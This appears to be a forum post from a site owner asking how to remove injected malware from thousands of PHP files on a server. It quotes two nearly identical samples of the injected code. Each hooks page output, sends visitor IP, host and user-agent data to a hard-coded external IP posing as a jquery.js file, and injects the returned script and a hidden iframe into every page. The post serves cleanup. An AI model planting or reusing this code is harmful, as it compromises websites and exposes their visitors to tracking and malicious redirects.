I have malware on all the files (thousands) throughout the server.
Normally I would just download all the files and then do a "search and replace" ALL in Dreamweaver and get rid of the malicious code in all the files.
However, the problem with this one is that each malicious code is different for each file.
Below you will see the malicious code from two separate PHP files on my site. The text in "green" is where it is different in every file.
Any way to remove this without having to go through thousands of files 1 by 1?
- Code: Select all
<?php /*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW <script type='text/javascript'>##JS##if (typeof KDDRTFGEG == 'undefined' && typeof f2 != 'undefined') {var it=f2().split('|');var dkm='';for (i=0;i<it.length;i++)dkm+=f1((it[i]-67)>>1);document.write("<iframe src='"+dkm+"' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script> AOLEW; $asd = preg_replace('/<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->(.*?)<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->/i', '', $asd); $sess_id = empty($_COOKIE['PHP_SESSION_ID']) ? 0 : intval($_COOKIE['PHP_SESSION_ID']); $sdf='';if ($sess_id < 2) $sdf = file_get_contents([color=#00BF00]'http://82.200.204.155/tmp/jquery.js?96=67&3be61b7b='.base64_encode[/color]($_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'|'.$_SERVER['HTTP_USER_AGENT']).'&fid=1fad2e56559d7f5e572cbe4200bac834'); if (!empty($sdf)) $sdf.= "var exdate=new Date();exdate.setDate(exdate.getDate() + 14);document.cookie='PHP_SESSION_ID=".(++$sess_id)."; expires='+exdate.toUTCString();"; return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/ ?>
- Code: Select all
<?php /*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW <script type='text/javascript'>##JS##if (typeof KDDRTFGEG == 'undefined' && typeof f2 != 'undefined') {var it=f2().split('|');var dkm='';for (i=0;i<it.length;i++)dkm+=f1((it[i]-55)>>1);document.write("<iframe src='"+dkm+"' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script> AOLEW; $asd = preg_replace('/<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->(.*?)<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->/i', '', $asd); $sess_id = empty($_COOKIE['PHP_SESSION_ID']) ? 0 : intval($_COOKIE['PHP_SESSION_ID']); $sdf='';if ($sess_id < 2) $sdf = file_get_contents('[color=#00BF00]http://82.200.204.155/tmp/jquery.js?968=55&9a='.base64_encode[/color]($_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'|'.$_SERVER['HTTP_USER_AGENT']).'&fid=1fad2e56559d7f5e572cbe4200bac834'); if (!empty($sdf)) $sdf.= "var exdate=new Date();exdate.setDate(exdate.getDate() + 14);document.cookie='PHP_SESSION_ID=".(++$sess_id)."; expires='+exdate.toUTCString();"; return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/ ?>